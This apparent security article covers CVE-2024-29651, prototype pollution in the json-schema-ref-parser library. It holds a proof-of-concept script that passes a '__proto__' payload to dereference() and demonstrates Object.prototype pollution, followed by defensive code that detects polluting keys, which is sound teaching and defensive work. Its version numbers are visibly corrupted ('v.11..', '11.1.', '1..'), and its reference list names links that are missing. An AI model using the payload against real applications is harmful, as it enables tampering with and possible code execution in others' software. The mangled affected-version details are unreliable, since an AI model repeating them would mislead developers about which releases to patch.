A Prototype Pollution issue in API Dev Tools json-schema-ref-parser has recently been disclosed for versions v.11.. and v.11.1.. The vulnerability, assigned CVE-2024-29651, has raised concerns among developers and users alike, because it potentially allows a remote attacker to execute arbitrary code via the bundle(), parse(), resolve(), and dereference() functions. In this long-read article, we dissect the vulnerability, the related code snippets, and the exploit details involved, and provide links to the resources and references you need.

An application pulls in an affected version of json-schema-ref-parser through a package.json dependency declaration such as:

{
  "name": "my-project",
  "version": "1..",
  "dependencies": {
    "json-schema-ref-parser": "11.."
  }
}

Or:

{
  "name": "my-project",
  "version": "1..",
  "dependencies": {
    "json-schema-ref-parser": "11.1."
  }
}

Exploit Details

The vulnerability resides within the following functions: bundle(), parse(), resolve(), and dereference(). By exploiting this issue, a remote attacker may be able to corrupt the application or even execute arbitrary code. When any of these functions processes a specially crafted JSON document, a "__proto__" key in that document is not rejected and ends up applied to the shared Object prototype. See the example below:

var RefParser = require('json-schema-ref-parser');

// Example of the malicious JSON input. JSON.parse is used so that "__proto__"
// is an own key of the object, exactly as it would be in a schema file read from
// disk or received over the network; written as an object literal, "__proto__"
// would only set the prototype of the literal and the parser would never see it.
var maliciousJSON = JSON.parse('{"__proto__": {"malProp": "malValue"}}');

async function exploit() {
  // Processing the document pollutes Object.prototype.
  await RefParser.dereference(maliciousJSON);
  // An unrelated, freshly created object now inherits the injected property.
  const testObj = {};
  console.log(testObj.malProp); // Output: "malValue" - indicates pollution
}

exploit();

In the above example, the dereference() function is used to process the maliciousJSON object. Upon execution, the "__proto__" entry is copied onto Object.prototype, so the unrelated testObj, which has no own properties at all, appears to have a malProp property inherited from the polluted prototype.

As a direct consequence of this vulnerability, an attacker who can supply a schema document to the application could leverage the prototype pollution to alter the behaviour of unrelated code, and potentially to execute arbitrary code and further compromise the target application.
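The defensive counterpart to the example above, written for this article as an added illustration and not taken from the advisory or from json-schema-ref-parser itself: a pre-check that screens untrusted schema text for prototype-polluting keys before it reaches bundle(), parse(), resolve() or dereference(), plus a post-check that reports any own property that appeared on Object.prototype while a processing step ran. The sample inputs are constructed for the demonstration.

```javascript
'use strict';

// Walk a parsed JSON value and return JSON-pointer paths of keys that can reach
// Object.prototype. "__proto__" is flagged wherever it appears. "constructor" is
// only flagged when it holds a "prototype" child, so a schema that merely
// describes a property named "constructor" is not reported as a false positive.
function findPollutingKeys(value, path = '', out = []) {
  if (value === null || typeof value !== 'object') return out;
  if (Array.isArray(value)) {
    value.forEach((item, i) => findPollutingKeys(item, `${path}/${i}`, out));
    return out;
  }
  // Object.keys lists own keys only; JSON.parse stores "__proto__" as an own key.
  for (const key of Object.keys(value)) {
    const child = value[key];
    const here = `${path}/${key}`;
    if (key === '__proto__') out.push(here);
    else if (key === 'constructor' && child !== null && typeof child === 'object' &&
             Object.prototype.hasOwnProperty.call(child, 'prototype')) out.push(`${here}/prototype`);
    findPollutingKeys(child, here, out);
  }
  return out;
}

// Parse untrusted schema text and reject the whole document if it carries
// polluting keys, rather than silently dropping them.
function parseSchemaStrict(text) {
  const doc = JSON.parse(text);
  const hits = findPollutingKeys(doc);
  if (hits.length > 0) throw new Error(`rejected schema, polluting keys at: ${hits.join(', ')}`);
  return doc;
}

// Run a processing step (for example a dereference call) and return the names
// of any own properties Object.prototype gained while it ran; [] means clean.
function newPrototypeProps(step) {
  const before = new Set(Object.getOwnPropertyNames(Object.prototype));
  step();
  return Object.getOwnPropertyNames(Object.prototype).filter((k) => !before.has(k));
}

// Constructed sample inputs: the payload shape from the article, and a benign
// schema whose "constructor" property must not trigger the check.
const MALICIOUS_TEXT = '{"__proto__": {"malProp": "malValue"}}';
const BENIGN_TEXT = '{"type":"object","properties":{"constructor":{"type":"string"}}}';

if (typeof require !== 'undefined' && require.main === module) {
  console.log(findPollutingKeys(JSON.parse(MALICIOUS_TEXT)));          // [ '/__proto__' ]
  console.log(findPollutingKeys(JSON.parse(BENIGN_TEXT)));             // []
  console.log(newPrototypeProps(() => parseSchemaStrict(BENIGN_TEXT))); // []
}
```

Keep the post-check in a test suite around every call that processes third-party schemas; it is cheap and catches a polluted prototype regardless of which key name an attacker used.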

The following resources provide more in-depth information about this vulnerability:

1. NVD (National Vulnerability Database) - The official listing of the vulnerability, its CVSS score, and related details can be found here: CVE-2024-29651.
2. API Dev Tools json-schema-ref-parser repository - The official GitHub repository of the affected library with details on its usage and functionality can be found here: json-schema-ref-parser.
3. Node.js Security Working Group - An advisory by the Node.js Security Working Group explaining the vulnerability, affected versions, and recommendations can be found here: Prototype Pollution in json-schema-ref-parser.

Conclusion

CVE-2024-29651 has demonstrated the importance of addressing Prototype Pollution vulnerabilities, especially in widely used libraries like json-schema-ref-parser. To protect your applications from this class of vulnerability, it is highly recommended to keep your dependencies up to date and to follow best practices for secure coding and input validation, including treating schema documents from untrusted sources as hostile input. Be sure to consult the resources above for further information on how to mitigate the risks associated with this vulnerability.

Timeline

Published on: 05/20/2024 18:15:10 UTC
Last modified on: 08/20/2024 14:35:13 UTC